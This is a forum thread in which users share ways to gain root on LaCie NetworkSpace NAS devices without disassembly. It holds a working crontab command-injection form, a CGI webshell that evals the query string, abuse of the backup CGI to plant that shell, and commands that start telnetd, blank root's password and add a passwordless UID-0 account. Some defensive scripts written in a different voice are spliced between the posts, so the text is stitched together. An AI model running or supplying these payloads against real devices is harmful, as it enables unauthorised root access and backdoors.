add ssh without disassembling

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

Re: add ssh without disassembling

Post by belese » Wed Jul 01, 2009 11:24 am

Otherwise,
you can try to put in the destination folder:

/www/cgi-bin/admin/home

and access webshell via: ...admin/home/'your dir'/webshell.

I didn't try it, but maybe it's a solution (depends on whether it creates the dir or not).

belese

hardel09
Posts: 6
Joined: Sat Jul 18, 2009 1:43 pm

Re: add ssh without disassembling

Post by hardel09 » Sat Jul 18, 2009 2:09 pm

Hello,

It is possible with latest firmware to install webshell, or run directly telnet, using crontab. To do that you have only to save this html and enter the command you want to run:

<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1' />
<title>Hack NAS</title>
<link rel='stylesheet' href='/css/lacie.css' type='text/css' />
</head>
<body>
<form name='edit_form' method='post' action='http://192.168.1.66/cgi-bin/admin/media'>
<input type='hidden' id='autoscn' name='autoscn' value=true>
<input type='hidden' id='modified' name='modified' value='true'>
<input name='hour' value='2>'><input name='minute' value='16 15 * * * sh /home/openshare/hack.sh > /home/openshare/scriptrunok '>

<input type=submit value='SET CRONTAB'>
</body>
</html>


Change 192.168.1.66 with the ip of your LACIE NAS, and 16 15 with the minutes/hours you want to execute the script.
Here it was 15:16. (but if you're not a newbie in Linux as I am it will be clear for you).

I compiled lots of tutorials to install ssh: here is the result: it works !!

Connect via telnet and install ipkg:
wget http://ipkg.nslu2-linux.org/feeds/optwa ... 10_arm.ipk
tar -xOvzf ipkg-opt_*_arm.ipk ./data.tar.gz | tar -C / -xzvf -
mkdir -p /opt/etc/ipkg
echo "src armel http://ipkg.nslu2-linux.org/feeds/optwa ... oss/stable" > /opt/etc/ipkg/armel-feed.conf
/opt/bin/ipkg update

Install openssh via ipkg:
/opt/bin/ipkg install openssh

Create a new user, here new_root. Into /etc/passwd I add:
new_root:x:0:0:Linux User,,,:/home:/bin/sh

Put an empty password for new_root. Into /etc/shadow I add:
new_root::12488:0:99999:7:::

Create a password for new_root: passwd new_root

Install ssh to run on each startup:
ln -s /opt/etc/init.d/S40sshd /etc/rc.d/rc3.d/

That's all.
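The form in this post works because schedule fields reach the crontab unchecked. The sketch below is an added example, not the LaCie firmware's code, showing the validation that rejects those field values; it assumes the CGI builds the crontab line from the hour and minute fields, and `CRON_CMD`, `valid_field` and `cron_line` are hypothetical names.

```shell
#!/bin/sh
# Added example, not the LaCie firmware's code: check the schedule fields of a
# CGI form before they are written into a crontab line.

CRON_CMD=/usr/local/bin/media_scan   # hypothetical fixed command, never user input

# valid_field VALUE MAX: succeeds only for one or two decimal digits <= MAX.
valid_field() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;   # empty, or any character that is not a digit
    esac
    [ "${#1}" -le 2 ] || return 1
    vf_n=${1#0}                    # drop one leading zero: "08" -> "8", "0" -> ""
    [ "${vf_n:-0}" -le "$2" ]
}

# cron_line HOUR MINUTE: prints "MIN HOUR * * * CMD", or fails with no output.
cron_line() {
    valid_field "$1" 23 || return 1
    valid_field "$2" 59 || return 1
    cl_h=${1#0}; cl_m=${2#0}
    printf '%s %s * * * %s\n' "${cl_m:-0}" "${cl_h:-0}" "$CRON_CMD"
}

# Constructed inputs: a normal schedule, then the two field values from the form above.
for pair in '15|16' '2>|16 15 * * * sh /home/openshare/hack.sh > /home/openshare/scriptrunok '; do
    hour=${pair%%|*}; minute=${pair#*|}
    if line=$(cron_line "$hour" "$minute"); then
        echo "accepted: $line"
    else
        echo "rejected: hour='$hour' minute='$minute'"
    fi
done
```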

Dekonass
Posts: 2
Joined: Sun Jul 19, 2009 8:27 am

Re: add ssh without disassembling

Post by Dekonass » Sun Jul 19, 2009 8:44 am

belese wrote: Hi,

I found a way to add webshell without disassembling.

It supposes you have access to the admin of twonkymedia

http://lacie.nas-central.org/wiki/Netwo ... diaServers

First you have to create a file Webshell and copy it to a folder on a USB key

#!/bin/sh
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING

Plug the USB key into the NAS.

I can't upload a file, so copy this code into an HTML page:

<html>
<head>
	<title>Backup</title>
	<script language='Javascript'>
	function submitForm()
	{
		document.edit_form.action = 'http://' + document.getElementById('ipnas').value + '/cgi-bin/admin/backup';
		document.edit_form.submit();
	}
	</script>
</head>
<body>

<form name='edit_form' method='post' >

Nas Ip address or Name
<br>
<input type='text' name='ipnas' id='ipnas' value='NetworkSpace' size='60'>
<br>

Source (Path to folder and not file on usbkey)
(Not / at the end)
<br>
<input type='text'  name='select2' id='select2'  value='/home/usbdisksdb1/webshell' size='60'>
<br>

Destination (Normally, don't modify)
(Not / at the end)
<br>
<input type='text' name='select1' id='select1' value='/www/cgi-bin/admin' size='60'>
<br>

<input type='hidden' id='update' name='update' value='true'>

<br>
<a href='javascript:submitForm();'>Copy</a>

</form>

</body>
</html>


Open it, complete it with the correct values and click copy.

It will display an error, but it copies the file, but it creates a directory with a timestamp.

So, to know the name of the directory:

http://your ip:9000/rpc/set_option?contentbase=/

Now go to a config page of twonky media (http://your ip:9000/config), and look for a directory; you now have access to all directories.
Go to "/www/cgi-bin/admin/".
The directory with the timestamp is there.

Copy it and paste it into:
http://your ip/cgi-bin/admin/your directory/webshell?

webshell is now working.

After that you can follow the procedure here:

http://jebimony.com/blog/content/add-ss ... -edmini-v2

Hi Mate,

Thanks a lot for your work.

This link http://jebimony.com/blog/content/add-ss ... -edmini-v2 is very hard to complete :)

So I hacked mine like this:

Copy "utelnetd" to /www/cgi-bin/admin/my_time_dir or to /home/openshare/utelnetd by network /openshare/utelnetd

Then activate telnet, with:

http://MY_LACIE_IP/cgi-bin/admin/kg-2009071820071247947833/webshell?/home/openshare/utelnetd

http://192.168.1.68/cgi-bin/admin/kg-2009071820071247947833/webshell?/home/openshare/utelnetd

Browser posts this:

telnetd: starting
  port: 23; interface: any; login program: /bin/login

Then with putty I telnet to the lacie, but I have no root passwd!!!

So the easy way I found:

http://192.168.1.68/cgi-bin/admin/kg-2009071820071247947833/webshell?/usr/bin/passwd -d root

Browser posts this:

/usr/bin/passwd -d root
Password changed.

Next telnet with putty, and it's done:
192.168.1.68 login: root



BusyBox v1.1.0 (2006.11.03-14:53+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

192.168.1.68 /root #
192.168.1.68 /root #
Linux:
FILMES /root # uname -a
Linux FILMES 2.6.12.6-arm1 #2 Thu Aug 14 16:36:28 CEST 2008 armv5tejl unknown
Partitions:

Disk /dev/sda: 1000.2 GB, 1000204886016 bytes
255 heads, 63 sectors/track, 121601 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

   Device Boot    Start       End    Blocks   Id  System
/dev/sda1               1         125     1004031    5  Extended
/dev/sda2             126      121601   975755970   83  Linux
/dev/sda5               1          16      128457   82  Linux swap
/dev/sda6              17          17        8001   83  Linux
/dev/sda7              18          18        8001   83  Linux
/dev/sda8              19          40      176683+  83  Linux
/dev/sda9              41         124      674698+  83  Linux
/dev/sda10            125         125        8001   83  Linux

Disk /dev/sdb: 1051 MB, 1051197440 bytes
14 heads, 13 sectors/track, 11280 cylinders
Units = cylinders of 182 * 512 = 93184 bytes

   Device Boot    Start       End    Blocks   Id  System
/dev/sdb1               1       11281     1026528    6  FAT16

Thanks in advance for your work!!!

Dekonass
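Both account changes in this thread, the `new_root` UID 0 entry and the password removed with `passwd -d root`, are visible in `/etc/passwd` and `/etc/shadow`. The audit below is an added example, not code from any poster; `audit_accounts` and `write_sample` are hypothetical names and the sample files are constructed.

```shell
#!/bin/sh
# Added example: audit account files for the two changes made in this thread,
# a second UID 0 account and an empty password field.

# audit_accounts PASSWD SHADOW: prints one finding per line, nothing when clean.
# The empty-field check runs over both files, since an empty second field in
# passwd also means "no password".
audit_accounts() {
    awk -F: '!/^#/ && $3 == 0 && $1 != "root" { print "uid0-duplicate " $1 }' "$1"
    awk -F: '!/^#/ && NF >= 2 && $2 == ""      { print "empty-password " $1 }' "$1" "$2"
}

# write_sample DIR: constructed files. The new_root lines are the ones quoted in
# hardel09's post; the root shadow line models the state after "passwd -d root".
write_sample() {
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
nobody:x:99:99:nobody:/:/bin/false
new_root:x:0:0:Linux User,,,:/home:/bin/sh
EOF
    cat > "$1/shadow" <<'EOF'
root::14444:0:99999:7:::
nobody:*:12488:0:99999:7:::
new_root::12488:0:99999:7:::
EOF
}

tmp=$(mktemp -d)
write_sample "$tmp"
audit_accounts "$tmp/passwd" "$tmp/shadow"
rm -rf "$tmp"
```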

PartisanEntity
Posts: 34
Joined: Sat Dec 27, 2008 11:12 pm
Location: Vienna, Austria

Re: add ssh without disassembling

Post by PartisanEntity » Sun Jul 19, 2009 7:19 pm

Sorry if this is obvious, I still have not quite grasped how to perform these steps.

In the original post there is a shell script, so do I have to copy that script, as well as the html file to a usb stick? (The shell doesn't seem to contain any meaningful code as far as I can tell which is why I am confused by it).

Thank you.
Web: cognitivecombine.com - OS's: Ubuntu 9.04 & Mac OSX 10.5

Dekonass
Posts: 2
Joined: Sun Jul 19, 2009 8:27 am

Re: add ssh without disassembling

Post by Dekonass » Mon Jul 20, 2009 8:01 am

PartisanEntity wrote: Sorry if this is obvious, I still have not quite grasped how to perform these steps.

In the original post there is a shell script, so do I have to copy that script, as well as the html file to a usb stick? (The shell doesn't seem to contain any meaningful code as far as I can tell which is why I am confused by it).

Thank you.

Copy only this:

#!/bin/sh
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING

But, make this file in linux, or using notepad++ in windows, then copy to usb, or to lacie openshare using path /home/openshare is the same ...

See you,

PartisanEntity
Posts: 34
Joined: Sat Dec 27, 2008 11:12 pm
Location: Vienna, Austria

Re: add ssh without disassembling

Post by PartisanEntity » Mon Jul 20, 2009 10:31 am

Dekonass wrote:
PartisanEntity wrote: Sorry if this is obvious, I still have not quite grasped how to perform these steps.

In the original post there is a shell script, so do I have to copy that script, as well as the html file to a usb stick? (The shell doesn't seem to contain any meaningful code as far as I can tell which is why I am confused by it).

Thank you.

Copy only this:

#!/bin/sh
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING

But, make this file in linux, or using notepad++ in windows, then copy to usb, or to lacie openshare using path /home/openshare is the same ...

See you,

Thanks very much for your response.

And what do I do with the html file, from where do I launch it?
Web: cognitivecombine.com - OS's: Ubuntu 9.04 & Mac OSX 10.5

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: add ssh without disassembling

Post by Daan » Mon Jul 20, 2009 4:35 pm

Open the html file in a browser on your desktop.

Hanoc
Posts: 1
Joined: Mon Sep 07, 2009 6:16 pm

Re: add ssh without disassembling

Post by Hanoc » Mon Sep 07, 2009 7:01 pm

Hi,

I haven't been able to execute the script in the Network Space.

I'll explain what I've done because maybe someone has a hint on how to continue.

The software version in my lacie is 1.1.6

The steps I followed are:

1. create a folder named "hack" in openshare.
2. create a file named backdoor in openshare\hack\ with the sh file above in that thread (#!/bin/sh ...)
3. create a file named "index.html" in openshare with the html above in that thread (<html><head><title>Backup</title>...)
4. open the file index.html with a browser in your computer
5. changed the first input in that webpage to my network space ip
6. changed the second input in that webpage to /home/openshare/hack
7. left the last input in that webpage as it is /www/cgi-bin/admin
8. clicked copy

At this point I got the same error as described by Ferretz:

"df: /www/cgi-bin/admin: can't find mount point. /www/cgi-bin/admin/backup: line 131: [: -lt: unary operator expected"

I continued anyway.

9. get access to the twonkyvision administration as indicated here:

http://lacie.nas-central.org/wiki/NetworkSpace:_MultimediaServers

10. access the twonkyvision configuration and go to basic setup > sharing in the left side menu
11. click on the "browse" button in any of the Content Locations: inputs.
12. an onscreen pop-up with the folder structure should appear
13. browse to www > cgi-bin > admin
14. there should be a folder named hack-200003310303954473206 with the numbers representing your actual timestamp.
15. copy the name
16. go to

http://your_lacie_disk_ip/cgi-bin/admin/webshell-xxxxxxxxxxxx/backdoor?whoami

It should say root.

My backdoor file did not get copied.

I tried a thousand combinations like copying files to
/www/cgi/bin/home
with no luck.

If I do the backup with some media files inside the folder hack they do get copied.
I successfully copied mp3, images and folders with this method, but any strange file like .sh or text files does not get copied.
Also the mp3 files copied disappeared from the hacked folder or at least did not become accessible via web.
I have been able to play an mp3 uploaded that way with a URL like this:

http://192.168.0.22:9000/disk/music/O1$14$744776806$2758043027.mp3/audio.mp3

but not with this:

http://192.168.0.22/cgi-bin/admin/hack-200003310303954472730/audio.mp3

Which is the address where I uploaded the mp3 in the first place.
Maybe the file did get moved or just made inaccessible from web.

Of course I tried to upload a sh file with the name backdoor.mp3 with no luck.

On the other hand I've also tried the crontab method but I had no luck with that either.

I created the html file, set the ip to my ip and the origin file to my file, executed it and set the minutes and seconds to a future time, but I got a not found in

http://192.168.0.22/cgi-bin/admin/media

I've checked with twonkyvision and I do not have the folder media.
Of course maybe I don't have the last version of the software.

Sorry for the redundancy, I had a little trouble getting all together the first time and, even if it did not work, I think it could be useful to someone.

SpecialeW
Posts: 13
Joined: Wed Sep 09, 2009 10:24 pm

Re: add ssh without disassembling

Post by SpecialeW » Fri Sep 11, 2009 10:07 pm

Hanoc,

You were able to find the folder using twonky I see, but what does it display if you go to http://networkspace/cgi-bin/admin/...
If you get an HTTP 404 not found error, you probably have the wrong character encoding.
Are you on a Windows PC?

grtz

jackal
Posts: 1
Joined: Fri Sep 25, 2009 10:31 pm

Re: add ssh without disassembling

Post by jackal » Fri Sep 25, 2009 10:43 pm

I also have version 1.1.8. The file did get uploaded to the correct dir at my system (you can check that by having the system copied *to* openshare).

If I would upload a file called "webshell", "hack", "imharmless" or whatever, it wouldn't be executed. For some reason, the file "config2" is executed, so I now got my own little webshell :-)

I'm not sure why this is so, maybe more on that some other time. Can others confirm this is working for 1.1.8 as well?

Good luck anyway... And thanks for all the tips!

P.S. You could also upload files through the twonkywonky, just set the upload dir appropriately. I think it will only upload actual media files (judging by the extensions)
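Since the posts above report the dropped file running under names such as `webshell`, `backdoor` or `config2`, a check of the web root has to look at directory naming and file content, not file names. The scan below is an added example, not code from any poster; it is meant to be run against a copy of the web root, `scan_cgi_dir` and `make_sample` are hypothetical names, and the sample tree is constructed.

```shell
#!/bin/sh
# Added example: look through a copy of the web root for what the backup-copy
# method described in this thread leaves behind.

# scan_cgi_dir ROOT: prints "timestamp-dir PATH" for directories whose name ends
# in a dash and 16 or more digits, and "eval-query PATH" for files that eval
# QUERY_STRING, whatever the file is called.
scan_cgi_dir() {
    find "$1" -type d | grep -E -e '-[0-9]{16,}$' | sed 's/^/timestamp-dir /'
    find "$1" -type f -exec grep -l -E 'eval.*QUERY_STRING' {} + |
        sed 's/^/eval-query /'
}

# make_sample DIR: constructed tree using directory and file names from this thread.
make_sample() {
    mkdir -p "$1/admin/kg-2009071820071247947833" "$1/admin/home"
    printf '#!/bin/sh\necho "Content-type: text/plain"\n' > "$1/admin/backup"
    printf '#!/bin/sh\neval $QUERY_STRING\n' \
        > "$1/admin/kg-2009071820071247947833/config2"
}

tmp=$(mktemp -d)
make_sample "$tmp"
scan_cgi_dir "$tmp"
rm -rf "$tmp"
```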

mattylad
Posts: 61
Joined: Sat Jul 11, 2009 10:20 pm

Re: add ssh without disassembling

Post by mattylad » Thu Nov 05, 2009 6:24 pm

Can I ask if this will in any way upset the way it is currently running?

I don't want to lose my data.
Dumb Windows user & 500gb Network Store owner.
I'm not compatible with Linux :(

lacienas
Posts: 9
Joined: Sat Feb 06, 2010 7:39 am

Re: add ssh without disassembling

Post by lacienas » Mon Feb 08, 2010 5:55 pm

If I go to:

http://MYIP/www/cgi-bin/admin

It couldn't be found?
Could you help me?

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: add ssh without disassembling

Post by Daan » Wed Feb 10, 2010 4:56 pm

There are several more polished guides to hacking the NetworkSpace:

http://beinfamous.blogspot.com/2009/08/ ... art-i.html
http://doyouhateme.bizarro.org.uk/2009/ ... thout.html
http://blog.hendricksen.eu/2009/07/29/g ... he-device/

Try one of these, they are based on belese's hack but probably easier to follow.

CUnknown
Posts: 22
Joined: Mon Dec 28, 2009 11:32 am

Re: add ssh without disassembling

Post by CUnknown » Mon Feb 15, 2010 1:11 am

Maybe it's time to make a thread with one working solution for version 1.18 (networkspace 1) and make that thread a sticky in this subforum?

It's getting confusing...

Ferretz
Posts: 3
Joined: Wed Jun 24, 2009 3:18 am

Re: add ssh without disassembling

Post by Ferretz » Mon Feb 15, 2010 2:11 am

I agree

The only approach I have managed to get working is the crontab method, i.e.

http://blog.hendricksen.eu/2009/07/29/g ... he-device/

The information on that page was clear and worked first time, so it gets my vote :D

Ackk Ooop.
